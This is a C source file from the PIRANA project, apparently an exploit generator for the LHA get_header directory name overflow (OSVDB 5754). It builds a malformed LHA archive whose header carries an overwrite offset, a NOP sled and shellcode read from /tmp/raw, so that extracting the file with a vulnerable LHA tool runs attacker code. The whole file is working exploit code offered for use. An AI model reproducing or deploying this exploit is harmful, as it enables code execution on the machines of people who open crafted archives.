/*

Copyright (C) 2005 - 2006 Jean-Sbastien Guay-Leroux

This file is part of PIRANA.

PIRANA is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

PIRANA is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with PIRANA; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

*/

/*

Exploit for the vulnerability: 
LHA get_header Directory Name Overflow
OSVDB ID: 5754

Shellcode filtered chars:
0x00

coded by Jean-Sbastien Guay-Leroux
December 2005

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

// Base structure of a LHA file
#define I_HEADER_SIZE			0
#define I_HEADER_CHECKSUM		1
#define I_METHOD			2
#define I_PACKED_SIZE			7
#define I_ORIGINAL_SIZE			11
#define I_LAST_MODIFIED_STAMP		15
#define I_ATTRIBUTE			19
#define I_HEADER_LEVEL			20
#define I_NAME_LENGTH			21
#define I_NAME				22
#define I_CRC				26
#define I_EXTEND_TYPE			28

// Extended structure of a LHA file
#define E_HEADER_SIZE			0
#define E_HEADER_TYPE			2
#define E_HEADER_NAME			3

#define DEBUG 0

char *shellcode1;

FILE * open_file (char *filename) {

	FILE *fp;

	fp = fopen ( filename , "w" );

	if (!fp) {
		perror ("Cant open file");
		exit (-1);
	}

	return fp;
}

void put_byte (char *ptr, unsigned char data) {
	*ptr = data;
}

void put_word (char *ptr, unsigned short data) {
	put_byte (ptr, data);
	put_byte (ptr + 1, data >> 8);
}

void put_longword (char *ptr, unsigned long data) {
	put_byte (ptr, data);
	put_byte (ptr + 1, data >> 8);
	put_byte (ptr + 2, data >> 16);
	put_byte (ptr + 3, data >> 24);
}

void read_shellcode () {

        FILE *fd;
        int c;
        int i = 0;

        if ( (fd = fopen ("/tmp/raw", "r")) == NULL) {
                perror ("Cant open /tmp/raw");
                exit (-1);
        }

        while ( ((c = fgetc (fd) ) != EOF) && (i < 1024) ) {
                shellcode1[i++] = c;
        }
        shellcode1[i] = 0x00;

        if (fclose (fd)) {
                perror ("Cant close /tmp/raw");
                exit (-1);
        }
}

void usage (char *progname) {

	printf ("\nTo use:\n");
	printf ("%s <offset> <archive name>\n\n", progname);

	exit (-1);
}

int main (int argc, char *argv[]) {

	FILE *fp;
	char *hdr = (char *) malloc (4096);
	int header_size;
	int written_bytes;
	int total_size;
	int offset;
	char *filename = (char *) malloc (256);

	if (!hdr) {
		perror ("Error allocating memory");
		exit (-1);
	}

	if ( argc != 3) {
		usage ( argv[0] );
	}

	sscanf (argv[1], "0x%x", &offset);
	strncpy (filename, argv[2], 255);

        shellcode1 = (char *) malloc (1024);
        read_shellcode ();

	memset (hdr, 0, 4096);

	// base header
	header_size = 29;
	put_byte (hdr + I_HEADER_SIZE, header_size);
	put_byte (hdr + I_HEADER_CHECKSUM, 83);
	memcpy (hdr + I_METHOD, "-lh0-", 5);
	put_longword (hdr + I_PACKED_SIZE, 0x1234);
	put_longword (hdr + I_ORIGINAL_SIZE, 0x1234);
	put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234);
	put_byte (hdr + I_ATTRIBUTE, 0x20);
	put_byte (hdr + I_HEADER_LEVEL, 0x01);	
	put_byte (hdr + I_NAME_LENGTH, 0x04);
	put_longword (hdr + I_NAME, offset);
	put_word (hdr + I_CRC, 0x6666);
	put_byte (hdr + I_EXTEND_TYPE, 0x55);

	// extended header 
	put_word (hdr + header_size + E_HEADER_SIZE, 316);
	put_byte (hdr + header_size + E_HEADER_TYPE, 0x2);
	memset (hdr + header_size + E_HEADER_NAME, 0x90, 310);

	// Put the shellcode ! 
	memcpy (hdr + header_size + E_HEADER_NAME + 250 - strlen (shellcode1), shellcode1, strlen (shellcode1));

	total_size = (header_size + 309 + E_HEADER_NAME + sizeof (offset) + 2);

	fp = open_file (filename);

	if ( (written_bytes = fwrite ( hdr, total_size, 1, fp)) != 0 ) {
		if (DEBUG) printf ("%d bytes have been written to the file\n", written_bytes);
	} else {
		perror ("Cant write to the file\n");
	}

	fclose (fp);

	if (DEBUG) printf ("0x%x has been used as an offset in the file %s\n", offset, filename);

	return 0;
}
